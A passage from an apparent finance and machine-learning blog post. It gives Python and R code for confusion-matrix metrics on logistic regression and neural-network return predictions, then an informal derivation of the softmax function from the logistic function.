    ax.set_yticklabels(['', 'Stinky', 'Poor', 'Mediocre', 'Good'], fontsize=14, rotation=90)
    ax.set_xlabel('Actual returns', fontsize=16)
    ax.set_ylabel('Predicted returns', fontsize=16)
    ax.tick_params(axis='both', which='major', pad=5)
    ax.set_title(title + ' confusion matrix', pad=40, fontsize=20)

    lines = [0.5, 1.5, 2.5]
    for line in lines:
        plt.axhline(line, color='grey')
        plt.axvline(line, color='grey')

    plt.grid(False)
    if save:
        save_fig_blog(save_title)
    plt.show()

    if print_metrics:
        FP = conf_mat.sum(axis=1) - np.diag(conf_mat)
        FN = conf_mat.sum(axis=0) - np.diag(conf_mat)
        TP = np.diag(conf_mat)
        TN = conf_mat.sum() - (FP + FN + TP)

        # Add 1e-10 to prevent division by zero
        # True positive rate
        tpr = TP/(TP+FN+1e-10)
        # Precision
        precision = TP/(TP+FP+1e-10)
        # False positive rate
        fpr = FP/(FP+TN+1e-10)

        print("")
        tab = pd.DataFrame(np.c_[['Stinky', 'Poor', 'Mediocre', 'Good'], tpr, fpr, precision],
                           columns=['Outcome', 'TPR', 'FPR',
'Precision']).set_index("Outcome") tab = tab.apply(pd.to_numeric) return tab, conf_mat ## Predictions log_pred = log_reg.predict(X_train) nn = model.predict(X_train) nn_pred = np.argmax(nn, axis=1) ## Logistic regression table tab1, conf_mat1 = conf_mat_table(log_pred, y_train_trans, save=False, title="Multiclass logistic regression", print_metrics=True, save_title='log_reg_conf_mat_1_tf3') # Save to csv for blog dir1 = "your/wd" folder = "/your_folder/" tab1.to_csv(dir1+folder+'tab1_tf3.csv') conf_mat1 = pd.DataFrame(data = conf_mat1, index=pd.Series(['Stinky', 'Poor','Mediocre', 'Good'], name='Outcome'), columns=['Stinky', 'Poor','Mediocre', 'Good']) conf_mat1.to_csv(dir1+folder+'/conf_mat1_tf3.csv') # [R] # Rmarkdown table # Asssumes we're in the directory to which we saved all those csvs. tab1 <- read_csv('tab1_tf3.csv') tab1 %>% mutate_at(vars("TPR", "FPR", "Precision"), function(x) format(round(x,3)*100,nsmallest=0)) %>% knitr::kable(caption = "Logistic regression scores (%)") conf_mat1 <- read_csv('conf_mat1_tf3.csv') stinky_rwr <- as.numeric(conf_mat1[1,5]/sum(conf_mat1[1,2:5])) good_rwr <- as.numeric(conf_mat1[4,2]/sum(conf_mat1[4,2:5])) stinky_prec <- as.numeric(tab1[1,4]) good_prec <- as.numeric(tab1[4,4]) good_2_Stinky <- (sum(conf_mat1[4,4:5])/sum(conf_mat1[4,2:3])) # [Python] ## Neutral network table tab2, conf_mat2 = conf_mat_table(nn_pred, y_train_trans, title="Neural network", save=False, print_metrics=True, save_title='nn_conf_mat_1_tf3') # Save to csv for blog tab2.to_csv(dir1+folder+'/tab2_tf3.csv') conf_mat2 = pd.DataFrame(data = conf_mat2, index=pd.Series(['Stinky', 'Poor','Mediocre', 'Good'], name='Outcome'), columns=['Stinky', 'Poor','Mediocre', 'Good']) conf_mat2.to_csv(dir1[:-13]+'/conf_mat2_tf3.csv') conf_mat2.to_csv(dir1+folder+'/conf_mat2_tf3.csv') # [R] # Rmarkdown table # Neural network # Asssumes we're in the directory to which we saved all those csvs. 
tab2 <- read_csv('tab2_tf3.csv') tab2 %>% mutate_at(vars("TPR", "FPR", "Precision"), function(x) format(round(x,3)*100,nsmallest=0)) %>% knitr::kable(caption = "Neural network scores") conf_mat2 <- read_csv('conf_mat2_tf3.csv') stinky_rwr1 <- as.numeric(conf_mat2[1,5]/sum(conf_mat2[1,2:5])) good_rwr1 <- as.numeric(conf_mat2[4,2]/sum(conf_mat2[4,2:5])) stinky_prec1 <- as.numeric(tab2[1,4]) good_prec1 <- as.numeric(tab2[4,4]) good_2_Stinky1 <- (sum(conf_mat2[4,4:5])/sum(conf_mat2[4,2:3]))
While we think the intuition behind the softmax function is relatively straightforward, deriving it is another matter. Our search has revealed either simplistic discussions or mathematical derivations that require a lot of formulas with matrix notation, or several formulas and a hand wave. While our aim is not to write tutorials, we do think it can be helpful to provide more rigor on complex topics. In general, we find most of the information out there on the main ML algorithms to be either math-averse or math-enchanted. There’s got to be a happy medium: one that gives you enough math to understand the nuances in a more formal way, but not so much that you need to have aced partial differential equations without ever having taken ordinary ones.^{4} Here’s our stab at this.
Let’s refresh our memories on softmax and logistic functions:
\[
Softmax(k, x_{1}, \ldots, x_{n}): \Large\frac{e^{x_{k}}}{\sum_{i=1}^{n}e^{x_{i}}}
\]
\[
f(k) =
\begin{cases}
1 \text{ if } k = argmax(x_{1}, \ldots, x_{n})
\\
0 \text{ otherwise}
\end{cases}
\]
\[
Logistic: \Large\frac{e^{x}}{1 + e^{x}}
\]
The logic behind the softmax function is as follows. Suppose you have a bunch of data that you think might predict various classes or categories of something of interest. For example, tail, ear, and snout length for a range of different dog breeds. First you encode the labels (e.g., breeds) as categorical variables (essentially integers). Then you build a neural network and apply weights and biases to the features (e.g., tail length, etc.). You then compare the output of the neural network against each label. But you need to transform the outputs into something that will tell you that a tail, ear, and snout of lengths x, y, and z are more likely to belong to a Poodle than a Pekingese. All you’ll get from applying weights and biases to all the features are bunches of numbers with lots of decimal places. You need some way to “squash” the data into a probabilistic range to say which breed is more likely than another given an input. Enter the softmax function.
Look at the formula and forget Euler’s constant (\(e\)) for a second. If you can do that, you should be able to see the softmax function as a simple frequency calculation: the number of Shih-tzus over the total number of Shih-tzus, Pekingese, and Poodles in the data set. Now recall that we’re actually dealing with lots of weights and biases applied to the variables, which could have different orders of magnitude once we’re finished with all the calculations. By raising Euler’s constant to the power of the final output, we set all values to an equivalent base, and we force the largest output to be much further away from all the others, unless there’s a tie. This has the effect of pushing the model to choose one class over all the others.^{5} Not so soft after all! Once we’ve transformed the outputs, we can then compare each one to the sum of the total to get the probability for each breed. The output with the highest probability corresponds to the breed the model believes it is most likely seeing. We can then check against the actual breed, calculate a loss function, backpropagate, and rerun.
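To make the “squashing” concrete, here is a minimal softmax sketch. The logits are made-up numbers standing in for a network’s raw outputs, not values from the models above:

```python
import numpy as np

def softmax(x):
    # Subtract the max for numerical stability; softmax is shift-invariant,
    # so this doesn't change the result.
    e = np.exp(x - np.max(x))
    return e / e.sum()

# Made-up raw outputs ("logits") for three breeds: Poodle, Pekingese, Shih-tzu
logits = np.array([2.0, 1.0, 0.1])
probs = softmax(logits)

print(probs)                          # three probabilities between 0 and 1
print(np.isclose(probs.sum(), 1.0))   # True: they sum to one
print(np.argmax(probs))               # 0: the largest raw output wins
```

Note how exponentiation widens the gap: the raw scores 2.0 and 1.0 differ by a factor of two, but their exponentiated versions differ by a factor of \(e\).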
But how does this relate to the logistic function other than that both use \(e\)?
If we perform some algebra on the logistic function we get:^{6}
\(\Large e^{x} = \frac{y}{1-y}\)
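The intermediate steps, added here for completeness, start from \(y = \frac{e^{x}}{1 + e^{x}}\):

\[
y(1 + e^{x}) = e^{x}
\;\Rightarrow\;
y = e^{x} - ye^{x} = e^{x}(1 - y)
\;\Rightarrow\;
e^{x} = \frac{y}{1 - y}
\]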
Thus \(e^{x}\) is the probability of some outcome over the probability of not that outcome. Hence, each \(e^{x}\) is equivalent to saying here’s the probability this is a Pekingese vs. not a Pekingese given the features. If we recognize that not a Pekingese is essentially all other breeds, then we can see how to get to the numerator in the softmax function. To transform this into a probability distribution in which all probabilities must sum to one, we sum all the \(e^{x}\)s. That’s the softmax denominator: \(\sum_{i=1}^{n}e^{x_{i}}\).
Whew! For such a rough explanation that was pretty long-winded. Can we derive the softmax function from the logistic function mathematically? One of the easiest ways is to reverse it using a two-case scenario.
If we only have Pekingese (\(e^{x_{p}}\)) and Shih-tzus (\(e^{x_{s}}\)), then the probability for each is:
\(\Large e^{x_{p}} = \frac{p}{1-p} = \frac{p}{s}\)
\(\Large e^{x_{s}} = \frac{s}{1-s} = \frac{s}{p}\)
Where:
\(x_{p}, x_{s}\) are the different weighted features that yield a Pekingese or a Shih-tzu
\(p, s\) are the probability of being a Pekingese or a Shih-tzu
Thus if we’re trying to estimate the probability of a Pekingese, the simplified calculation using the softmax function looks like the following?
\(\Large\frac{e^{x_{p}}}{e^{x_{p}} + e^{x_{s}}}\)
If the evidence for the Shih-tzu is zero, then \(x_{s}\) is zero and hence \(e^{x_{s}}\) is \(1\), which resolves to:
\(\Large\frac{e^{x_{p}}}{1 + e^{x_{p}}}\)
The logistic function! Neat, but doesn’t this seem like a sleight of hand? It’s not as obvious how it would work if we were to add a third category like a Poodle. Moreover, it doesn’t exactly help us build the softmax function from the logistic.
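We can sanity-check the two-case reduction numerically. A quick sketch, where `x_p` is an arbitrary value standing in for the weighted evidence:

```python
import numpy as np

def softmax(x):
    # Numerically stable softmax; shift-invariance means the result is unchanged
    e = np.exp(x - np.max(x))
    return e / e.sum()

def logistic(x):
    return np.exp(x) / (1 + np.exp(x))

x_p = 1.7  # arbitrary evidence for the Pekingese
# Two-class softmax with zero evidence for the Shih-tzu (so e^0 = 1)...
two_class = softmax(np.array([x_p, 0.0]))[0]

# ...collapses to the logistic function evaluated at x_p
print(np.isclose(two_class, logistic(x_p)))  # True
```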
If we start with the log-odds as we did in the last post, that might prove to be more fruitful. Recall for a binary outcome it looks like the following:
\(\Large log(\frac{p_{i}}{1-p_{i}}) = \beta_{i} x\)
Let \(p_{i}\) be the probability of one class,
let \(Z\) be the normalizing constant that accounts for all the possible classes,
and let \(\beta_{i} x\) represent the particular weights applied to \(x\) to arrive at \(p_{i}\).
Then,
\(\Large p_{i} = \frac{e^{\beta_{i} x}}{Z}\)
Since all the probabilities must sum to 1:
\(\Large 1 = \sum_{j=1}^{K} \frac{e^{\beta_{j}x}}{Z}\)
Since \(Z\) is a constant, it can be pulled out of the summation:
\(\Large 1 = \frac{1}{Z} \sum_{j=1}^{K} e^{\beta_{j}x}\)
This yields:
\(\Large Z = \sum_{j=1}^{K} e^{\beta_{j}x}\)
Thus:
\(\Large p_{i} = \frac{e^{\beta_{i}x}}{\sum_{j=1}^{K} e^{\beta_{j}x}}\)
Magic! The softmax function.
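As a final numeric check, the derived formula behaves as a probability distribution. A sketch with made-up numbers standing in for the \(\beta_{i}x\) terms:

```python
import numpy as np

# Arbitrary stand-ins for the beta_i * x terms of K = 4 classes
beta_x = np.array([0.5, -1.2, 2.0, 0.3])

# Z is the normalizing constant derived above: the sum of exponentiated evidence
Z = np.exp(beta_x).sum()
p = np.exp(beta_x) / Z

print(np.isclose(p.sum(), 1.0))  # True: a proper probability distribution
print(np.argmax(p))              # 2: the class with the most evidence
```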
We’ve been meaning to do a post comparing return distributions between asset classes, but haven’t got around to it. If you’ve seen a good article on the subject, please email us at the address below. We don’t want to reinvent the wheel!︎
We actually heard this phrase on the Streetwise podcast recently and thought it was too funny to pass up.︎
When we first started to write this section we thought we could encapsulate it pretty easily. Instead, we had a hard time pulling ourselves out of the rabbit hole. If something seems wrong or off, let us know!︎
Like my lovely wife!︎
This doesn’t always work and sometimes features need to be normalized prior to training or need an additional ‘jiggering’ at activation. We don’t know about you, but even though we get the logic behind using exponentiation, we can’t help but wonder whether it is biasing results just for force a more emphatic outcome. If you can shed light on this for us, please email us at the address below.︎